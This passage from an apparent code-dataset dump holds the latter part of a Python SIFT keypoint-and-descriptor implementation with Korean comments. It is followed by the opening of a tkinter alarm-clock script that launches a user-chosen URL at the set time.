** (1/a) # scale step\n\n lv1sigma = np.array([s , s * k, s * (k**2), s * (k**3), s * (k**4), s * (k**5)]) #double image에 적용될 sigma.\n lv2sigma = np.array([s * (k**3) , s * (k**4), s * (k**5), s * (k**6), s * (k**7), s * (k**8) ]) #Original size image #start : 2 * sigma\n lv3sigma = np.array([s * (k**6) , s * (k**7), s * (k**8), s * (k**9), s * (k**10), s * (k**11) ]) #half size image #start : 4 * sigma\n lv4sigma = np.array([s * (k**9) , s * (k**10), s * (k**11), s * (k**12), s * (k**13), s * (k**14) ]) #quater size image #start : 8 * sigma\n totalSig = np.array([s*k, s*(k**2), s * (k**3), s * (k**4), s * (k**5), s * (k**6), s * (k**7), s * (k**8), s * (k**9),s * (k**10),\n s * (k**11), s * (k**12)])\n\n #image resize\n doubled = cv2.resize(src,None, fx = 2.0, fy = 2.0, interpolation = cv2.INTER_LINEAR) #원본의 2배\n normal = cv2.resize(doubled, None, fx = 0.5, fy = 0.5, interpolation = cv2.INTER_LINEAR) #원본과 동일 size\n half = cv2.resize(src, None, fx = 0.5, fy = 0.5, interpolation = cv2.INTER_LINEAR) #반반\n quarter = cv2.resize(half, None, fx = 0.5, fy = 0.5, interpolation = cv2.INTER_LINEAR) #1/4, 1/4\n\n # Gaussian 피라미드 저장할 3차원 배열\n lv1py = np.zeros((doubled.shape[0], doubled.shape[1], 6)) #6개의 Gaussian blurring 된 이미지\n lv2py = np.zeros((normal.shape[0], normal.shape[1], 6))\n lv3py = np.zeros((half.shape[0], half.shape[1], 6))\n lv4py = np.zeros((quarter.shape[0], quarter.shape[1], 6))\n\n print('make gaussian pyr')\n # Gaussian을 계산\n # ksize = 2 * int(4 * sigma + 0.5) + 1\n for i in range(6):\n ksize = 2 * int(4 * lv1sigma[i] + 0.5) + 1\n lv1py[:,:,i] = cv2.GaussianBlur(doubled, (ksize,ksize), lv1sigma[i])\n ksize = 2 * int(4 * lv2sigma[i] + 0.5) + 1\n lv2py[:,:,i] = cv2.resize(cv2.GaussianBlur(doubled, (ksize,ksize), lv2sigma[i]), None, fx = 0.5, fy = 0.5, interpolation = cv2.INTER_LINEAR)\n ksize = 2 * int(4 * lv3sigma[i] + 0.5) + 1\n lv3py[:,:,i] = cv2.resize(cv2.GaussianBlur(doubled, (ksize,ksize), lv3sigma[i]),None, fx =0.25, fy = 0.25, interpolation = cv2.INTER_LINEAR)\n ksize = 2 * int(4 * lv4sigma[i] + 0.5) + 1\n lv4py[:,:,i] = cv2.resize(cv2.GaussianBlur(doubled, (ksize,ksize), lv4sigma[i]),None, fx= 1/8, fy = 1/8, interpolation = cv2.INTER_LINEAR)\n\n #DoG 피라미드를 저장할 3차원 배열\n DoGlv1 = np.zeros((doubled.shape[0], doubled.shape[1], 5))\n DoGlv2 = np.zeros((normal.shape[0], normal.shape[1], 5))\n DoGlv3 = np.zeros((half.shape[0], half.shape[1], 5))\n DoGlv4 = np.zeros((quarter.shape[0], quarter.shape[1], 5))\n\n print('calc DoG')\n\n # DoG를 계산\n for i in range(5):\n DoGlv1[:,:,i] = np.subtract(lv1py[:,:,i+1],lv1py[:,:,i])\n DoGlv2[:,:,i] = np.subtract(lv2py[:,:,i+1],lv2py[:,:,i])\n DoGlv3[:,:,i] = np.subtract(lv3py[:,:,i+1],lv3py[:,:,i])\n DoGlv4[:,:,i] = np.subtract(lv4py[:,:,i+1],lv4py[:,:,i])\n\n # 극값의 위치를 표시할 3차원 배열\n extPy1 = np.zeros((doubled.shape[0], doubled.shape[1], 3))\n extPy2 = np.zeros((normal.shape[0], normal.shape[1], 3))\n extPy3 = np.zeros((half.shape[0], half.shape[1], 3))\n extPy4 = np.zeros((quarter.shape[0], quarter.shape[1], 3))\n\n #Extrema의 위치 계산\n #lv1 pyramids\n print('find extrema')\n\n for i in range(1, 4):\n for j in range(1, doubled.shape[0]-1):\n for k in range(1, doubled.shape[1]-1):\n target = DoGlv1[j,k,i] #현재 Pixel\n comp = DoGlv1[j-1:j+2, k-1:k+2, i-1:i+2] #비교 범위\n #xhat = np.dot(np.linalg.inv(H), dD) # true X(x,y,s) location\n\n if (comp.max() == target and target > 0) or (comp.min() == target and target < 0 ): #최대값이나 최소값이면.\n dx = (DoGlv1[j, k + 1, i] - DoGlv1[j, k - 1, i]) * 0.5\n dy = (DoGlv1[j + 1, k, i] - DoGlv1[j - 1, k, i]) * 0.5\n ds = 
(DoGlv1[j, k, i + 1] - DoGlv1[j, k, i-1]) * 0.5\n # (y, x+1) + (y, x-1) - 2 * (y,x) / 255 - 나머지도 똑같이\n dxx = (DoGlv1[j, k + 1, i] + DoGlv1[j, k - 1, i] - 2 * DoGlv1[j, k, i])\n dyy = (DoGlv1[j + 1, k, i] + DoGlv1[j - 1, k, i] - 2 * DoGlv1[j, k, i])\n dss = (DoGlv1[j, k, i + 1] + DoGlv1[j, k, i-1] - 2 * DoGlv1[j, k, i])\n # x축 미분 값으로 y축 미분, x축 미분 값으로 s축 미분, y축 미분 값으로 s축 미분.\n dxy = (DoGlv1[j + 1, k + 1, i] - DoGlv1[j + 1, k - 1, i] - DoGlv1[j - 1, k + 1, i] +\n DoGlv1[j - 1, k - 1, i]) * 0.25\n dxs = (DoGlv1[j, k + 1, i + 1] - DoGlv1[j, k - 1, i + 1] - DoGlv1[j, k + 1, i - 1] +\n DoGlv1[j, k - 1, i - 1]) * 0.25\n dys = (DoGlv1[j + 1, k, i + 1] - DoGlv1[j - 1, k, i + 1] - DoGlv1[j + 1, k, i - 1] +\n DoGlv1[j - 1, k, i - 1]) * 0.25\n\n dD = np.array([[dx], [dy], [ds]])\n H = np.array([[dxx, dxy, dxs],\n [dxy, dyy, dys],\n [dxs, dys, dss]])\n xhat = np.linalg.lstsq(-H, dD, rcond = -1)[0]\n #low contrast 제거를 위해 계산.\n Dxhat = target + 0.5 * np.dot(dD.transpose(),xhat)\n #edge response 제거를 위해 계산.\n #원 논문 기준 H = 2x2 matrix가 맞음.\n det = H[0,0]*H[1,1] - H[0,1]*H[1,0] # H 의 determinant\n tr = H[0,0] + H[1,1] # H의 trace\n threshR = ((r+1) ** 2) # r은 좌변에 따로 곱해줌\n if np.abs(xhat[0]) > 0.5 or np.abs(xhat[1]) > 0.5 or np.abs(xhat[2]) > 0.5 \\\n or np.abs(Dxhat) < thresh or det < 0 or (tr ** 2) * r > (det * threshR): #low contrast, edge response 제거\n continue\n else:\n extPy1[j,k,i-1] = 1 #extrema & not low contrast & not edge response\n\n #lv2 pyramids\n for i in range(1,4): #0과 1\n for j in range(1, normal.shape[0]-1):\n for k in range(1, normal.shape[1]-1):\n target = DoGlv2[j, k, i] # 현재 Pixel\n comp = DoGlv2[j - 1:j + 2, k - 1:k + 2, i - 1:i + 2] # 비교 범위\n # xhat = np.dot(np.linalg.inv(H), dD) # true X(x,y,s) location\n\n if (comp.max() == target and target > 0) or (comp.min() == target and target < 0 ): # 최대값이나 최소값이면.\n dx = (DoGlv2[j, k + 1, i] - DoGlv2[j, k - 1, i]) * 0.5\n dy = (DoGlv2[j + 1, k, i] - DoGlv2[j - 1, k, i]) * 0.5\n ds = (DoGlv2[j, k, i + 1] - DoGlv2[j, k, i - 1]) * 0.5\n # (y, x+1) + (y, x-1) - 2 * (y,x) / 255 - 나머지도 똑같이\n dxx = (DoGlv2[j, k + 1, i] + DoGlv2[j, k - 1, i] - 2 * DoGlv2[j, k, i])\n dyy = (DoGlv2[j + 1, k, i] + DoGlv2[j - 1, k, i] - 2 * DoGlv2[j, k, i])\n dss = (DoGlv2[j, k, i + 1] + DoGlv2[j, k, i - 1] - 2 * DoGlv2[j, k, i])\n # x축 미분 값으로 y축 미분, x축 미분 값으로 s축 미분, y축 미분 값으로 s축 미분.\n dxy = (DoGlv2[j + 1, k + 1, i] - DoGlv2[j + 1, k - 1, i] - DoGlv2[j - 1, k + 1, i] +\n DoGlv2[j - 1, k - 1, i]) * 0.25\n dxs = (DoGlv2[j, k + 1, i + 1] - DoGlv2[j, k - 1, i + 1] - DoGlv2[j, k + 1, i - 1] +\n DoGlv2[j, k - 1, i - 1]) * 0.25\n dys = (DoGlv2[j + 1, k, i + 1] - DoGlv2[j - 1, k, i + 1] - DoGlv2[j + 1, k, i - 1] +\n DoGlv2[j - 1, k, i - 1]) * 0.25\n\n dD = np.array([[dx], [dy], [ds]])\n H = np.array([[dxx, dxy, dxs],\n [dxy, dyy, dys],\n [dxs, dys, dss]])\n xhat = np.linalg.lstsq(-H, dD, rcond = -1)[0]\n # low contrast 제거를 위해 계산.\n Dxhat = target + 0.5 * np.dot(dD.transpose(), xhat)\n #Dxhat = Dxhat / 255.\n # edge response 제거를 위해 계산.\n # 원 논문 기준 H = 2x2 matrix가 맞음.\n det = H[0, 0] * H[1, 1] - H[0, 1] * H[1, 0] # H 의 determinant\n tr = H[0, 0] + H[1, 1] # H의 trace\n threshR = ((r + 1) ** 2)\n if np.abs(xhat[0]) > 0.5 or np.abs(xhat[1]) > 0.5 or np.abs(xhat[2]) > 0.5 \\\n or np.abs(Dxhat) < thresh or det < 0 or (tr ** 2) * r > (det * threshR): # low contrast, edge response 제거\n continue\n else:\n extPy2[j, k, i-1] = 1 # extrema & not low contrast & not edge response\n\n #lv3 pyramids\n for i in range(1,4): #0과 1\n for j in range(1, half.shape[0]-1):\n for k in range(1, 
half.shape[1]-1):\n target = DoGlv3[j, k, i] # 현재 Pixel\n comp = DoGlv3[j - 1:j + 2, k - 1:k + 2, i - 1:i + 2] # 비교 범위\n\n if (comp.max() == target and target > 0) or (comp.min() == target and target < 0 ): # 최대값이나 최소값이면.\n dx = (DoGlv3[j, k + 1, i] - DoGlv3[j, k - 1, i]) * 0.5\n dy = (DoGlv3[j + 1, k, i] - DoGlv3[j - 1, k, i]) * 0.5\n ds = (DoGlv3[j, k, i + 1] - DoGlv3[j, k, i - 1]) * 0.5\n # (y, x+1) + (y, x-1) - 2 * (y,x) / 255 - 나머지도 똑같이\n dxx = (DoGlv3[j, k + 1, i] + DoGlv3[j, k - 1, i] - 2 * DoGlv3[j, k, i])\n dyy = (DoGlv3[j + 1, k, i] + DoGlv3[j - 1, k, i] - 2 * DoGlv3[j, k, i])\n dss = (DoGlv3[j, k, i + 1] + DoGlv3[j, k, i - 1] - 2 * DoGlv3[j, k, i])\n # x축 미분 값으로 y축 미분, x축 미분 값으로 s축 미분, y축 미분 값으로 s축 미분.\n dxy = (DoGlv3[j + 1, k + 1, i] - DoGlv3[j + 1, k - 1, i] - DoGlv3[j - 1, k + 1, i] +\n DoGlv3[j - 1, k - 1, i]) * 0.25\n dxs = (DoGlv3[j, k + 1, i + 1] - DoGlv3[j, k - 1, i + 1] - DoGlv3[j, k + 1, i - 1] +\n DoGlv3[j, k - 1, i - 1]) * 0.25\n dys = (DoGlv3[j + 1, k, i + 1] - DoGlv3[j - 1, k, i + 1] - DoGlv3[j + 1, k, i - 1] +\n DoGlv3[j - 1, k, i - 1]) * 0.25\n\n dD = np.array([[dx], [dy], [ds]])\n H = np.array([[dxx, dxy, dxs],\n [dxy, dyy, dys],\n [dxs, dys, dss]])\n xhat = np.linalg.lstsq(-H, dD, rcond = -1)[0]\n # low contrast 제거를 위해 계산.\n Dxhat = target + 0.5 * np.dot(dD.transpose(), xhat)\n #Dxhat = Dxhat / 255.\n # edge response 제거를 위해 계산.\n # 원 논문 기준 H = 2x2 matrix가 맞음.\n det = H[0, 0] * H[1, 1] - H[0, 1] * H[1, 0] # H 의 determinant\n tr = H[0, 0] + H[1, 1] # H의 trace\n threshR = ((r + 1) ** 2)\n if np.abs(xhat[0]) > 0.5 or np.abs(xhat[1]) > 0.5 or np.abs(xhat[2]) > 0.5 \\\n or np.abs(Dxhat) < thresh or det < 0 or (tr ** 2) * r > (det * threshR): # low contrast, edge response 제거\n continue\n else:\n extPy3[j, k, i-1] = 1 # extrema & not low contrast & not edge response\n\n #lv4 pyramids\n for i in range(1,4): #0과 1\n for j in range(1, quarter.shape[0]-1):\n for k in range(1, quarter.shape[1]-1):\n target = DoGlv4[j, k, i] # 현재 Pixel\n comp = DoGlv4[j - 1:j + 2, k - 1:k + 2, i - 1:i + 2] # 비교 범위\n # xhat = np.dot(np.linalg.inv(H), dD) # true X(x,y,s) location\n\n if (comp.max() == target and target > 0) or (comp.min() == target and target < 0 ): # 최대값이나 최소값이면.\n dx = (DoGlv4[j, k + 1, i] - DoGlv4[j, k - 1, i]) * 0.5\n dy = (DoGlv4[j + 1, k, i] - DoGlv4[j - 1, k, i]) * 0.5\n ds = (DoGlv4[j, k, i + 1] - DoGlv4[j, k, i - 1]) * 0.5\n # (y, x+1) + (y, x-1) - 2 * (y,x) / 255 - 나머지도 똑같이\n dxx = (DoGlv4[j, k + 1, i] + DoGlv4[j, k - 1, i] - 2 * DoGlv4[j, k, i])\n dyy = (DoGlv4[j + 1, k, i] + DoGlv4[j - 1, k, i] - 2 * DoGlv4[j, k, i])\n dss = (DoGlv4[j, k, i + 1] + DoGlv4[j, k, i - 1] - 2 * DoGlv4[j, k, i])\n # x축 미분 값으로 y축 미분, x축 미분 값으로 s축 미분, y축 미분 값으로 s축 미분.\n dxy = (DoGlv4[j + 1, k + 1, i] - DoGlv4[j + 1, k - 1, i] - DoGlv4[j - 1, k + 1, i] +\n DoGlv4[j - 1, k - 1, i]) * 0.25\n dxs = (DoGlv4[j, k + 1, i + 1] - DoGlv4[j, k - 1, i + 1] - DoGlv4[j, k + 1, i - 1] +\n DoGlv4[j, k - 1, i - 1]) * 0.25\n dys = (DoGlv4[j + 1, k, i + 1] - DoGlv4[j - 1, k, i + 1] - DoGlv4[j + 1, k, i - 1] +\n DoGlv4[j - 1, k, i - 1]) * 0.25\n\n dD = np.array([[dx], [dy], [ds]])\n H = np.array([[dxx, dxy, dxs],\n [dxy, dyy, dys],\n [dxs, dys, dss]])\n xhat = np.linalg.lstsq(-H, dD, rcond = -1)[0]\n # low contrast 제거를 위해 계산.\n Dxhat = target + 0.5 * np.dot(dD.transpose(), xhat)\n #Dxhat = Dxhat / 255.\n # edge response 제거를 위해 계산.\n # 원 논문 기준 H = 2x2 matrix가 맞음.\n det = H[0, 0] * H[1, 1] - H[0, 1] * H[1, 0] # H 의 determinant\n tr = H[0, 0] + H[1, 1] # H의 trace\n threshR = ((r + 1) ** 2)\n if np.abs(xhat[0]) > 
0.5 or np.abs(xhat[1]) > 0.5 or np.abs(xhat[2]) > 0.5 \\\n or np.abs(Dxhat) < thresh or det < 0 or (tr ** 2) * r > (det * threshR): # low contrast, edge response 제거\n continue\n else:\n extPy4[j, k, i-1] = 1 # extrema & not low contrast & not edge response\n\n extr_sum = extPy1.sum() + extPy2.sum() + extPy3.sum() + extPy4.sum()\n extr_sum = extr_sum.astype(np.int)\n keypoints = np.zeros((extr_sum, 4)) # 검출된 극값들의 수 만큼 keypoints 정보를 저장할 배열 생성. 정보가 4개\n\n # ---- 과제가 여기 까지 ---- (Keypoints 배열에 저장하는 건 따로 해야함)\n\n magLv1 = np.zeros((doubled.shape[0], doubled.shape[1], 3))\n magLv2 = np.zeros((normal.shape[0], normal.shape[1], 3))\n magLv3 = np.zeros((half.shape[0], half.shape[1], 3))\n magLv4 = np.zeros((quarter.shape[0], quarter.shape[1], 3))\n\n oriLv1 = np.zeros((doubled.shape[0], doubled.shape[1], 3))\n oriLv2 = np.zeros((normal.shape[0], normal.shape[1], 3))\n oriLv3 = np.zeros((half.shape[0], half.shape[1], 3))\n oriLv4 = np.zeros((quarter.shape[0], quarter.shape[1], 3))\n\n dx = np.array([[-1., 0., 1.]]) * 0.5\n dy = np.array([[-1.], [0.], [1.]]) * 0.5\n\n dxDouble = cv2.filter2D(doubled, -1 ,dx)\n dyDouble = cv2.filter2D(doubled, -1, dy)\n dxNormal = cv2.filter2D(normal, -1, dx)\n dyNormal = cv2.filter2D(normal, -1, dy)\n dxHalf = cv2.filter2D(half, -1, dx)\n dyHalf = cv2.filter2D(half, -1, dy)\n dxQuarter = cv2.filter2D(quarter, -1, dx)\n dyQuarter = cv2.filter2D(quarter, -1, dy)\n\n # magnitude / orientation 계산\n for i in range(3):\n magLv1[:, :, i] = np.sqrt((dxDouble ** 2) + (dyDouble ** 2))\n magLv2[:, :, i] = np.sqrt((dxNormal ** 2) + (dyNormal ** 2))\n magLv3[:, :, i] = np.sqrt((dxHalf ** 2) + (dyHalf ** 2))\n magLv4[:, :, i] = np.sqrt((dxQuarter ** 2) + (dyQuarter ** 2))\n oriLv1[:, :, i] = np.arctan2(dxDouble,dyDouble)\n oriLv2[:, :, i] = np.arctan2(dxNormal,dyNormal)\n oriLv3[:, :, i] = np.arctan2(dxHalf,dyHalf)\n oriLv4[:, :, i] = np.arctan2(dxQuarter,dyQuarter)\n count = 0\n\n print('orient assignment')\n\n #Keypoint 방향 할당\n #lv1 pyr\n for i in range(3):\n gausK = cv2.getGaussianKernel(16, 1.5 * lv1sigma[i + 1])\n gausK = np.dot(gausK, gausK.T)\n for j in range(doubled.shape[0]):\n for k in range(doubled.shape[1]):\n if extPy1[j,k,i] == 1:\n orient_hist = np.zeros([36, 1])\n for y in range(-8, 8):\n for x in range(-8, 8):\n if j+y < 0 or j+y > doubled.shape[0]-1 or k+x < 0 or k+x > doubled.shape[1]-1:\n continue\n weighted_mag = magLv1[j+y, k+x, i] * gausK[y+8, x+8]\n bin_idx = int((oriLv1[j+y, k+x, i] * 180 / np.pi) / 10)\n orient_hist[bin_idx] += weighted_mag\n max_val = np.max(orient_hist)\n max_idx = np.argmax(orient_hist)\n keypoints[count, :] = np.array([int(j * 0.5), int(k * 0.5), lv1sigma[i + 1], max_idx])\n count += 1\n #새로운 max value를 찾아서 0.8배보다 큰지 확인\n orient_hist[max_idx] = 0\n new_val = np.max(orient_hist)\n while new_val > 0.8 * max_val: #maxVal 값의 0.8배 이상의 값이면 이 또한 Keypoint의 방향\n new_idx = np.argmax(orient_hist)\n np.append(keypoints,np.array([int(j * 0.5), int(k * 0.5), lv1sigma[i + 1], new_idx]))\n orient_hist[new_idx] = 0\n new_val = np.max(orient_hist)\n\n # lv2 pyr\n for i in range(3):\n gausK = cv2.getGaussianKernel(16, 1.5 * lv2sigma[i + 1])\n gausK = np.dot(gausK, gausK.T)\n for j in range(normal.shape[0]):\n for k in range(normal.shape[1]):\n if extPy2[j, k, i] == 1.:\n orient_hist = np.zeros([36, 1])\n for y in range(-8, 8):\n for x in range(-8, 8):\n if j + y < 0 or j + y > normal.shape[0] - 1 or k + x < 0 or k + x > normal.shape[1] - 1:\n continue\n weighted_mag = magLv2[j + y, k + x, i] * gausK[y + 8, x + 8]\n bin_idx = int((oriLv2[j+y, k+x, i] * 
180 / np.pi) / 10)\n orient_hist[bin_idx] += weighted_mag\n max_val = np.max(orient_hist)\n max_idx = np.argmax(orient_hist)\n keypoints[count, :] = np.array([j, k, lv2sigma[i + 1], max_idx])\n count += 1\n # 새로운 max value를 찾아서 0.8배보다 큰지 확인\n orient_hist[max_idx] = 0\n new_val = np.max(orient_hist)\n while new_val > 0.8 * max_val: # maxVal 값의 0.8배 이상의 값이면 이 또한 Keypoint의 방향\n new_idx = np.argmax(orient_hist)\n np.append(keypoints,np.array([j, k, lv2sigma[i + 1], new_idx]))\n orient_hist[new_idx] = 0\n new_val = np.max(orient_hist)\n\n #lv3 pyr\n for i in range(3):\n gausK = cv2.getGaussianKernel(16, 1.5 * lv3sigma[i + 1])\n gausK = np.dot(gausK, gausK.T)\n for j in range(half.shape[0]):\n for k in range(half.shape[1]):\n if extPy3[j, k, i] == 1.:\n orient_hist = np.zeros([36, 1])\n for y in range(-8, 8):\n for x in range(-8, 8):\n if j + y < 0 or j + y > half.shape[0] - 1 or k + x < 0 or k + x > half.shape[1] - 1:\n continue\n weighted_mag = magLv3[j + y, k + x, i] * gausK[y + 8, x + 8]\n bin_idx = int((oriLv3[j+y, k+x, i] * 180 / np.pi) / 10)\n orient_hist[bin_idx] += weighted_mag\n max_val = np.max(orient_hist)\n max_idx = np.argmax(orient_hist)\n keypoints[count, :] = np.array([j*2, k*2, lv3sigma[i + 1], max_idx])\n count += 1\n # 새로운 max value를 찾아서 0.8배보다 큰지 확인\n orient_hist[max_idx] = 0\n new_val = np.max(orient_hist)\n while new_val > 0.8 * max_val: # maxVal 값의 0.8배 이상의 값이면 이 또한 Keypoint의 방향\n new_idx = np.argmax(orient_hist)\n np.append(keypoints,np.array([j*2, k*2, lv3sigma[i + 1], new_idx]))\n orient_hist[new_idx] = 0\n new_val = np.max(orient_hist)\n\n #lv4 pyr\n for i in range(3):\n gausK = cv2.getGaussianKernel(16, 1.5 * lv4sigma[i + 1])\n gausK = np.dot(gausK, gausK.T)\n for j in range(quarter.shape[0]):\n for k in range(quarter.shape[1]):\n if extPy4[j, k, i] == 1.:\n orient_hist = np.zeros([36, 1])\n for y in range(-8, 8):\n for x in range(-8, 8):\n if j + y < 0 or j + y > quarter.shape[0] - 1 or k + x < 0 or k + x > quarter.shape[1] - 1:\n continue\n weighted_mag = magLv4[j + y, k + x, i] * gausK[y + 8, x + 8]\n bin_idx = int((oriLv4[j+y, k+x, i] * 180 / np.pi) / 10)\n orient_hist[bin_idx] += weighted_mag\n max_val = np.max(orient_hist)\n max_idx = np.argmax(orient_hist)\n keypoints[count, :] = np.array([j*4, k*4, lv4sigma[i + 1], max_idx])\n count += 1\n # 새로운 max value를 찾아서 0.8배보다 큰지 확인\n orient_hist[max_idx] = 0\n new_val = np.max(orient_hist)\n while new_val > 0.8 * max_val: # maxVal 값의 0.8배 이상의 값이면 이 또한 Keypoint의 방향\n new_idx = np.argmax(orient_hist)\n np.append(keypoints, np.array([j*4, k*4, lv4sigma[i + 1], new_idx]))\n orient_hist[new_idx] = 0\n new_val = np.max(orient_hist)\n # ----- 여기까지 Keypoints의 위치와 방향을 저장한 배열 Keypoints 생성 완료. 
----\n # ----- Keypoint[keycounts, 4] : 각각의 Column은 original scale 기준의 (Y,X), scale(sigma), orientation 을 가짐.\n\n print('Calc descriptor')\n\n #descriptor 구하기\n descriptors = np.zeros((keypoints.shape[0], 128)) #Keypoints의 수만큼 필요, 128개의 설명자 (cell에서의 histogram intensity)\n\n magpyr = np.zeros((normal.shape[0], normal.shape[1], 12)) #extrema를 찾은 DoG image 3개의 magnitude x py 4\n oripyr = np.zeros((normal.shape[0], normal.shape[1], 12))\n\n for i in range(3):\n #(X,y)\n magpyr[:,:,i] = cv2.resize(magLv1[:,:,i], (normal.shape[1], normal.shape[0]), interpolation = cv2.INTER_LINEAR).astype(np.float32)\n oripyr[:,:,i] = cv2.resize(oriLv1[:,:,i], (normal.shape[1], normal.shape[0]), interpolation = cv2.INTER_LINEAR).astype(np.int)\n magpyr[:,:,i+2] = magLv2[:,:,i].astype(np.float32)\n oripyr[:,:,i+2] = oriLv2[:,:,i].astype(np.int)\n magpyr[:,:,i+4] = cv2.resize(magLv3[:,:,i], (normal.shape[1], normal.shape[0]), interpolation = cv2.INTER_LINEAR).astype(np.float32)\n oripyr[:,:,i+4] = cv2.resize(oriLv3[:,:,i], (normal.shape[1], normal.shape[0]), interpolation = cv2.INTER_LINEAR).astype(np.int)\n magpyr[:,:,i+6] = cv2.resize(magLv4[:,:,i], (normal.shape[1], normal.shape[0]), interpolation = cv2.INTER_LINEAR).astype(np.float32)\n oripyr[:,:,i+6] = cv2.resize(oriLv4[:,:,i], (normal.shape[1], normal.shape[0]), interpolation = cv2.INTER_LINEAR).astype(np.int)\n\n for i in range(keypoints.shape[0]):\n gausK = cv2.getGaussianKernel(16, keypoints[i, 2])\n gausK = np.dot(gausK, gausK.T)\n for y in range(-8, 8):\n for x in range(-8, 8):\n theta = keypoints[i,3] * 10 * np.pi / 180.\n xrot = np.round((np.cos(theta) * x) - (np.sin(theta) * y)) # 거리에 따른 회전량(X,Y 좌표 상대 위치)\n yrot = np.round((np.sin(theta) * x) + (np.cos(theta) * y))\n sIdx = np.argmax(totalSig == keypoints[i,2]) #sigma 크기에 따라 0~7\n if int(keypoints[i,0] + yrot) < 0 or int(keypoints[i,0] + yrot) > (normal.shape[0]-1) \\\n or int(keypoints[i,1] + xrot) < 0 or int(keypoints[i,1] + xrot) > (normal.shape[1]-1):\n continue\n #회전된 위치에서의 가중치를 구함.\n weight = magpyr[int(keypoints[i,0]+yrot),int(keypoints[i,1]+xrot), sIdx] * gausK[y+8, x+8]\n # 회전시켰으니 원래의 angle을 빼줌.\n #key에는 원래 angle의 index 저장.(0~35)\n angle = int(oripyr[int(keypoints[i,0]+yrot),int(keypoints[i,1]+xrot), sIdx] * 180 / np.pi / 10) - keypoints[i, 3]\n if angle < 0 :\n angle += 36 #10도 간격으로 분할되었기 때문에, 36을 더해줌.\n\n new_bin = int(angle * 10 / 45)\n yOffset = (y+8) // 4\n xOffset = (x+8) // 4\n descriptors[i, 32 * yOffset + 8 * xOffset + new_bin] += weight\n\n descriptors[i, :] = np.true_divide(descriptors[i, :], np.sum(descriptors[i, :]))\n descriptors[i][np.isnan(descriptors[i,:])] = 0\n descriptors[i][descriptors[i] < 0.2] = 0 #0.2 아래의 값 제거.\n descriptors[i, :] = np.true_divide(descriptors[i, :] , np.sum(descriptors[i, :]))\n descriptors[i][np.isnan(descriptors[i, :])] = 0\n\n return [keypoints, descriptors]\n\nif __name__ == '__main__':\n src = cv2.imread('.\\\\building.jpg')\n gray = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)\n gray = gray.astype(np.double)\n gray /= 255.\n\n thresh = 0.03\n r = 10. #원 논문에서 값을 10으로 사용\n\n [keypoints, descriptor] = SIFT(gray, thresh = thresh, r = r)\n\n for i in range(len(keypoints)):\n y1 = int(keypoints[i, 0])\n x1 = int(keypoints[i, 1])\n theta = (keypoints[i, 3] * 10. 
* np.pi) / 180.\n        length = keypoints[i, 2] * 5\n        x2 = int(x1 + length * np.cos(theta))\n        y2 = int(y1 + length * np.sin(theta))\n        cv2.arrowedLine(src, (x1, y1), (x2, y2), (0, 0, 255))\n        #cv2.circle(src, (int(keypoints[i,1]), int(keypoints[i,0])), int(2 * keypoints[i,2]), (0, 0, 255), 1) # 해당 위치에 원을 그려주는 함수\n        #cv2.circle(src, (int(keypoints[i,1]), int(keypoints[i,0])), 2, (0, 0, 255), 1) # 해당 위치에 원을 그려주는 함수\n\n    src2 = cv2.imread('.\\\\building_temp.jpg')\n    gray2 = cv2.cvtColor(src2, cv2.COLOR_BGR2GRAY)\n    gray2 = gray2.astype(np.double) / 255\n\n    [keypoints2, descriptor2] = SIFT(gray2, thresh=thresh, r=r)\n\n    for i in range(len(keypoints2)):\n        y1 = int(keypoints2[i, 0])\n        x1 = int(keypoints2[i, 1])\n        theta = (keypoints2[i, 3] * 10. * np.pi) / 180.\n        length = keypoints2[i, 2] * 5\n        x2 = int(x1 + length * np.cos(theta))\n        y2 = int(y1 + length * np.sin(theta))\n        cv2.arrowedLine(src2, (x1, y1), (x2, y2), (0, 0, 255))\n        #cv2.circle(src2, (int(keypoints2[i,1]), int(keypoints2[i,0])), int(2 * keypoints2[i,2]), (0, 0, 255), 1) # 해당 위치에 원을 그려주는 함수\n\n    cv2.imshow('src', src)\n    cv2.imshow('src2', src2)\n    cv2.waitKey()\n    cv2.destroyAllWindows()","sub_path":"7주차+자료/SIFT.py","file_name":"SIFT.py","file_ext":"py","file_size_in_byte":28407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"295645281","text":"#Real time clock uses tkinter master.after() command and a recursive function call\r\n#Alarm Clock, allows URL links + custom title for URL, opens default webbrowser to set URL at the set time\r\n\r\n#Written by Kelly Schmidt\r\n\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nimport webbrowser\r\nimport time\r\nimport pickle\r\n\r\n#Class for the main clock display\r\nclass MainDisplay(Frame):\r\n    def __init__(self, master = None):\r\n        super().__init__(master)\r\n        self.master = master\r\n        self.grid()\r\n        \r\n#Sets theme for all comboboxes\r\n        self.tk_setPalette(background = 'bisque4', foreground = 'black')\r\n        self.style = ttk.Style()\r\n        self.style.theme_use('clam')\r\n        self.style.configure('TCombobox', fieldbackground = 'green', background = 'bisque4', foreground = 'white')\r\n\r\n#Initialize and call any methods/attributes that need to be started on program startup\r\n        self.hour_list = ['{:02d}'.format(num) for num in range(1, 13)]\r\n        self.minute_list = ['{:02d}'.format(num) for num in range(60)]\r\n        self.hours = int(time.ctime()[11:13])\r\n        self.minutes = int(time.ctime()[14:16])\r\n        self.seconds = int(time.ctime()[17:19])\r\n        \r\n        self.clock = Canvas(self)\r\n        self.display = self.clock.create_rectangle(0, 0, 400, 500, fill = 'black')\r\n        self.clock_time = self.clock.create_text(175, 150, fill = 'orange', font = ('Verdana', 30))\r\n        self.date_display = self.clock.create_text(172, 100, fill = 'orange', font = ('Verdana', 30))\r\n        self.clock.grid(row = 0, column = 0, padx = 1, pady = 5, rowspan = 10)\r\n        \r\n        self.alarm_widgets()\r\n        self.main_display()\r\n    \r\n    def main_display(self):\r\n        self.date_text = '{}{}'.format(time.ctime()[:8], int(time.ctime()[8:10]))\r\n        if self.hours < 12:\r\n            self.clock_text = '{}:{:02d}:{:02d}AM'.format(self.hours, self.minutes, self.seconds)\r\n        else:\r\n            self.clock_text = '{}:{:02d}:{:02d}PM'.format(self.hours, self.minutes, self.seconds)\r\n        \r\n        self.clock.itemconfigure(self.clock_time, text = self.clock_text)\r\n        self.clock.itemconfigure(self.date_display, text = self.date_text )\r\n        self.master.after(1000, self._ticker)\r\n\r\n#updates clock for main display\r\n    def _ticker(self):\r\n        self.hours = 
